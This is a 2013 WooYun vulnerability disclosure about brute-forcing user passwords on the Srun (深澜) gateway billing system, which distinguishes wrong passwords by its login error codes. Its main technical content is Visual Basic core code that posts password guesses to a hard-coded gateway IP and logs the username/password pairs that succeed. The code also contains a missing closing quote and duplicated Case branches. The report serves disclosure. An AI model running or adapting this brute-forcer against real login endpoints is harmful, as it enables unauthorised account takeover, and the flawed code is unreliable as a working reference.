当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042004

漏洞标题:暴力破解深澜网关计费系统用户密码

相关厂商:深澜软件

漏洞作者: headhuanglan

提交时间:2013-11-05 10:19

修复时间:2013-12-20 10:20

公开时间:2013-12-20 10:20

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-05: 细节已通知厂商并且等待厂商处理中
2013-11-09: 厂商已经确认,细节仅向厂商公开
2013-11-19: 细节向核心白帽子及相关领域专家公开
2013-11-29: 细节向普通白帽子公开
2013-12-09: 细节向实习白帽子公开
2013-12-20: 细节向公众公开

简要描述:

可以通过判断服务器返回值的方式,暴力破解深澜网关

详细说明:

post到服务器的数据username=xxx&password={TEXT}xxxxx&drop=0&type=1&n=100
然后服务器会返回user_tab_error username_error password_error ername_error等返回值,这时候可以通过判断返回值对用户的密码进行暴力破解

漏洞证明:

QQ图片20131105003050.jpg


核心代码

postdata = "username=" + CStr(uname) + "&password={TEXT}" + pwd + "&drop=0&type=1&n=100"
r = HttpPost("http://202.4.130.95/cgi-bin/do_login", postdata)
Select Case r
Case "user_tab_error":
Label4.Caption = "认证程序未启动"
Case "username_error":
Label4.Caption = "用户名错误"
Case "password_error":
Label4.Caption = "密码错误"
Case "user_tab_error":
Label4.Caption = "认证程序未启动
Case "username_error":
Label4.Caption = "用户名错误"
Case "non_auth_error":
Label4.Caption = "您无须认证,可直接上网"
Case "password_error":
Label4.Caption = "密码错误"
Case "status_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "available_error":
Label4.Caption = "用户已禁用"
Case "ip_exist_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "usernum_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "online_num_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "mode_error":
Label4.Caption = "系统已禁止WEB方式登录,请使用客户端"
Case "time_policy_error":
Label4.Caption = "当前时段不允许连接"
Case "flux_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "minutes_error":
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
Case "ip_error":
Label4.Caption = "您的IP地址不合法"
Case "mac_error":
Label4.Caption = "您的MAC地址不合法"
Case "sync_error":
Label4.Caption = "您的资料已修改,正在等待同步,请2分钟后再试。"
Case Else
Text3.Text = Text3.Text + CStr(uname) + " " + pwd + vbCrLf
Timer1.Interval = 0
flag = 1
Call Command1_Click
End Select

修复方案:

提交的验证请求加session???你们更专业

版权声明:转载请注明来源 headhuanglan@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-11-09 19:35

厂商回复:

CNVD未能直接复现所述情况,所述系统多部署于内部网关,根据图片以及所述代码情况进行确认,rank 15

最新状态:

暂无


漏洞评价:

评论